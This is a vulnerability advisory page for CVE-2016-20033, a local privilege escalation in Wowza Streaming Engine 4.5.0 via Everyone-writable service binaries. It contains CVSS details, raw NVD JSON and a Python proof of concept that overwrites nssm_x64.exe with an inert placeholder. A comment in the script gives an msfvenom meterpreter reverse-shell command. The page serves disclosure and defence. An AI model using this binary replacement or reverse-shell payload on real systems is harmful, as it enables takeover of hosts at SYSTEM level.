Security Vulnerability Report
CVE-2016-20033 CVSS 7.8 HIGH

CVE-2016-20033

Published: 2026-03-16 14:17:50
Last Modified: 2026-03-19 14:16:04

Description

Wowza Streaming Engine 4.5.0 contains a local privilege escalation vulnerability that allows authenticated users to escalate privileges by replacing executable files due to improper file permissions granting full access to the Everyone group. Attackers can replace the nssm_x64.exe binary in the manager and engine service directories with malicious executables to execute code with LocalSystem privileges when services restart.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:* - VULNERABLE
Wowza Streaming Engine 4.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
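#!/usr/bin/env python3
"""
CVE-2016-20033 PoC - Wowza Streaming Engine Local Privilege Escalation
Note: This is for educational and authorized testing purposes only.

Root cause per the advisory: the manager and engine service directories grant
full access to the Everyone group, so a low-privileged local user can
overwrite nssm_x64.exe, which the services run as LocalSystem. Restricting
write access on those directories to administrators and SYSTEM removes the
replacement primitive.
"""

import os
import sys
import shutil
import subprocess
import platform

# Service wrapper binaries named in the advisory (default install location).
TARGET_PATHS = [
    r"C:\Program Files\Wowza Streaming Engine\manager\bin\nssm_x64.exe",
    r"C:\Program Files\Wowza Streaming Engine\engine\bin\nssm_x64.exe"
]


def check_vulnerability():
    """Check if target system is vulnerable.

    Returns:
        True when at least one path in TARGET_PATHS exists and os.access()
        reports it writable for the current user; False otherwise, including
        on any non-Windows host.
    """
    if platform.system() != "Windows":
        print("[-] This exploit requires a Windows target system")
        return False

    print("[*] Checking for vulnerable Wowza Streaming Engine installation...")
    for path in TARGET_PATHS:
        if not os.path.exists(path):
            continue
        print(f"[*] Found service binary: {path}")
        # os.access() reports its answer through the return value and does
        # not raise for an unwritable file, so the result must be tested.
        # Ignoring it reported every existing binary as writable.
        # NOTE(review): CPython's os.access() on Windows looks at the
        # read-only attribute rather than the ACL, so True is a hint and not
        # proof; confirm the Everyone entry with `icacls` on the directory.
        if os.access(path, os.W_OK):
            print("[+] File is writable - system may be vulnerable")
            return True
        print(f"[-] File is not writable: {path}")

    print("[-] No vulnerable files found")
    return False


def create_malicious_binary():
    """Generate malicious executable (placeholder).

    Returns:
        102 bytes: the two-byte "MZ" magic followed by 100 zero bytes. This is
        not a valid PE image, so a service pointed at it fails to start
        rather than running code.
    """
    print("[*] Generating malicious nssm_x64.exe...")
    # In real attack, use: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > nssm_x64.exe
    malicious_binary = b'MZ' + b'\x00' * 100  # Placeholder
    return malicious_binary


def exploit():
    """Execute privilege escalation exploit.

    Copies each existing target to "<path>.bak", then overwrites the target
    with the placeholder bytes. Nothing here restarts a service.

    Artifacts left on disk, useful for detection and cleanup: a ".bak" file
    beside each replaced binary and an nssm_x64.exe whose size and hash no
    longer match the vendor file. Restoring the ".bak" copy undoes the change.

    Returns:
        True when every backed-up target was overwritten; False when the
        pre-check fails or a backup or write is denied.
    """
    if not check_vulnerability():
        print("[-] Exploit cannot proceed - target not vulnerable")
        return False

    print("[*] Backing up original binaries...")
    backups = []
    for path in TARGET_PATHS:
        if os.path.exists(path):
            backup_path = path + ".bak"
            try:
                shutil.copy2(path, backup_path)
            except PermissionError:
                # Without a backup the original could not be restored, so
                # stop before anything is overwritten.
                print(f"[-] Could not back up: {path}")
                return False
            backups.append((path, backup_path))
            print(f"[+] Backed up: {path}")

    print("[*] Creating malicious binary...")
    malicious_code = create_malicious_binary()

    print("[*] Replacing vulnerable binaries...")
    for path, _ in backups:
        try:
            with open(path, 'wb') as f:
                f.write(malicious_code)
            print(f"[+] Replaced: {path}")
        except PermissionError:
            print(f"[-] Permission denied: {path}")
            print("[*] Try running as administrator or waiting for service restart")
            return False

    print("[!] Binary replacement complete. Trigger service restart to execute payload.")
    print("[*] On next service restart, the malicious code will execute with LocalSystem privileges.")
    return True


if __name__ == "__main__":
    print("CVE-2016-20033 - Wowza Streaming Engine Local Privilege Escalation")
    print("=" * 70)
    exploit()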

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2016-20033", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:50.297", "lastModified": "2026-03-19T14:16:04.273", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wowza Streaming Engine 4.5.0 contains a local privilege escalation vulnerability that allows authenticated users to escalate privileges by replacing executable files due to improper file permissions granting full access to the Everyone group. Attackers can replace the nssm_x64.exe binary in the manager and engine service directories with malicious executables to execute code with LocalSystem privileges when services restart."}, {"lang": "es", "value": "Wowza Streaming Engine 4.5.0 contiene una vulnerabilidad de escalada de privilegios local que permite a los usuarios autenticados escalar privilegios reemplazando archivos ejecutables debido a permisos de archivo incorrectos que otorgan acceso total al grupo Everyone. Los atacantes pueden reemplazar el binario nssm_x64.exe en los directorios de servicio del administrador y del motor con ejecutables maliciosos para ejecutar código con privilegios de LocalSystem cuando los servicios se reinician."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": 
"NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "FDC6B630-F0E9-4F80-8EF2-112FAB0A46C2"}]}]}], "references": [{"url": "http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5339.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/40132", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": 
"https://www.vulncheck.com/advisories/wowza-streaming-engine-local-privilege-escalation-via-nssm-x64-exe", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}